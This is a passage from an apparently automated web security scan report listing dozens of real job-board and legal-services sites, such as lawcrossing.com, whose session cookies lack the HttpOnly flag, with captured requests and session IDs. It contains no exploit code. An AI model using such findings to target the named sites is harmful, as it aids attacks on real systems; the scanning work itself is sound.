regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.62. http://www.financialservicescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.financialservicescrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.63. http://www.foodservicescrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.foodservicescrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.64. http://www.fundraisingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.fundraisingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.65. http://www.giscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.giscrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.66. http://www.governmentcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.governmentcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.67. http://www.graduateschoolloans.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.graduateschoolloans.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.68. http://www.healthcarecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.healthcarecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.69. http://www.helpdeskcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.helpdeskcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:06 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:06 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.70. http://www.hospitalitycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hospitalitycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=q8m0d2m0af2bg06uti2kh5prd0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:08 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:08 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:08 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hospitalitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.71. http://www.hound.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hound.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=a827dr0sigiku3i02l6760rfb1; path=/; domain=hound.com
country=United+States; expires=Sun, 20-Feb-2011 19:34:57 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.72. http://www.hound.com/gjsearchresult.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hound.com
Path:	/gjsearchresult.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=d9q7enc1nis5276b2qurtlt332; path=/; domain=hound.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gjsearchresult.php HTTP/1.1
Host: www.hound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.73. http://www.hrcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hrcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=p4a701ljjtkci3m6f866chs876; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:18 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:18 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:18 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hrcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.74. http://www.hvaccrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.hvaccrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=pber3q1f9cj4n51gq3upv43jp0; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:32 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:32 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:32 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hvaccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.75. http://www.informationtechnologycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.informationtechnologycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=k1m7ouon0b4rcae41h2bgg8ig6; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:43 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:43 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:43 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.informationtechnologycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.76. http://www.insurcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.insurcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ecpq66kc364asgd97g8ralsb30; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:46 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:46 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:46 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.insurcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.77. http://www.intellectualpropertycrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.intellectualpropertycrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.intellectualpropertycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.78. http://www.internshipcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.internshipcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.79. http://www.j2eecrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.j2eecrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.80. http://www.journalismcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.journalismcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.81. http://www.lawcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.82. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/article/6070/Brooklyn-Law-School/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.83. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/article/6154/Anne-Healy-LIDS/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.84. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.85. http://www.lawcrossing.com/lcjssearchresults.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/lcjssearchresults.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.86. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawcrossing.com
Path:	/salarysurvey/lcsalarysurvey.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.87. http://www.lawfirmstaff.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawfirmstaff.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=egea78a3rqgqf8pr582hmugbv0; path=/; domain=www.lawfirmstaff.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lawfirmstaff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.88. http://www.lawschoolloanreport.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawschoolloanreport.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=nivvn9c4qv4ger2d748thpv5d2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lawschoolloanreport.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=nivvn9c4qv4ger2d748thpv5d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10640

<html>
<head>
<TITLE>Student Loan Report, Student Aid Report, Student Financial Aid Report, Federal Student Aid Report . Law School Loan Report</TITLE>
<meta name="Description" content="Law School
...[SNIP]...

10.89. http://www.lawschoolloans.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.lawschoolloans.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.90. https://www.lawschoolloans.com/lslprivateloan_application.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.lawschoolloans.com
Path:	/lslprivateloan_application.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=a79edba2b2ee06d236e602f04f766868; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lslprivateloan_application.php HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.91. http://www.legalauthority.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/
PHPSESSID=itiitg0ro0btc7r4bgoq60nao3; path=/; domain=.legalauthority.com
LA_RUSH_ORDER=deleted; expires=Thu, 21-Jan-2010 19:41:21 GMT; path=/; domain=.legalauthority.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.92. http://www.legalauthority.com/signup.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/signup.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/
PHPSESSID=6g5f9o9lenr88jd1ft2nnmijv6; path=/; domain=.legalauthority.com

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.93. http://www.legalauthority.com/tmlandingpage.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/tmlandingpage.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=p1af1u3t2cg87k68135k4t85s4; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tmlandingpage.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 21 Jan 2011 23:39:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p1af1u3t2cg87k68135k4t85s4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.legalauthority.com/signup.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1

10.94. http://www.legalauthority.com/tmviewbanner.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthority.com
Path:	/tmviewbanner.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=l84i6u5b77fejg78f776j97925; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tmviewbanner.php HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=l84i6u5b77fejg78f776j97925; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=iso-8859-1

10.95. http://www.legalauthorityfinancial.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.legalauthorityfinancial.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=qehl4db4i9jtun1bl38idujof7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.legalauthorityfinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qehl4db4i9jtun1bl38idujof7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Length: 7593
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Legal Authority Financial Services</title>
<meta name="google-site-verifi
...[SNIP]...

10.96. http://www.logisticscrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.logisticscrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=bge253g268slkfifh0ptl28dv1; path=/
flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.logisticscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.97. http://www.managercrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.managercrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=346sk676v0frg7f966ahgna1s4; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:11 GMT
useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
usercity=2655979; expires=Sat, 29-Jan-2011 01:23:11 GMT
regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:11 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.98. http://www.manufacturingcrossing.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.manufacturingcrossing.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=5ot5i4vicpofvo6i92rqjh7uc5; path=/
flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:44 GMT
